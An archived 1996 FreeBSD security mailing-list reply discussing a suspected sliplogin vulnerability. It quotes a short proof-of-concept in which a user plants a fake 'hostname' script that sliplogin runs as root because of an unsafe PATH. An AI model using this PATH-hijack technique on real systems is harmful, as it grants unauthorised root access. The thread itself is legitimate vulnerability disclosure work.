From owner-freebsd-security Mon Feb 12 08:52:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id IAA10376 for security-outgoing; Mon, 12 Feb 1996 08:52:21 -0800 (PST) Received: from rocky.sri.MT.net (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id IAA10370 for ; Mon, 12 Feb 1996 08:52:16 -0800 (PST) Received: (from nate@localhost) by rocky.sri.MT.net (8.6.12/8.6.12) id JAA19323; Mon, 12 Feb 1996 09:54:44 -0700 Date: Mon, 12 Feb 1996 09:54:44 -0700 From: Nate Williams Message-Id: <199602121654.JAA19323@rocky.sri.MT.net> To: Michael Constant Cc: mconst@csua.berkeley.edu, nate@sri.MT.net, freebsd-security@freebsd.org Subject: Re: sliplogin hole? In-Reply-To: <199602121036.CAA23693@maelstrom.Berkeley.EDU> References: <199602121036.CAA23693@maelstrom.Berkeley.EDU> Sender: owner-security@freebsd.org Precedence: bulk > Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which > is just as insecure as not changing the path at all :-) But thanks for > pointing out my misconception. Hmmm..... Maybe I am confused, although I see that piece of code used in the 'sh' sources. > The exploit as I stated it does work; it's written out in full below, > in case I didn't explain it clearly in my original letter. ... > > jrl@host% cd ~/bin > jrl@host% cat > hostname > #! /bin/sh > touch /etc/i-am-root > /bin/hostname > ^D > jrl@host% chmod 755 hostname > jrl@host% sliplogin Sjrl > starting slip login for Sjrl > > ... and by this point, the deed is done. I just tried this, and it didn't work on my box although I was allowed to run sliplogin. It dies with: sliplogin[953]: ioctl (TIOCSCTTY): Operation not permitte Which might not occur on a dial-in line. Unfortunately, I'm unable to test this out right now, but I will try it out from home. Nate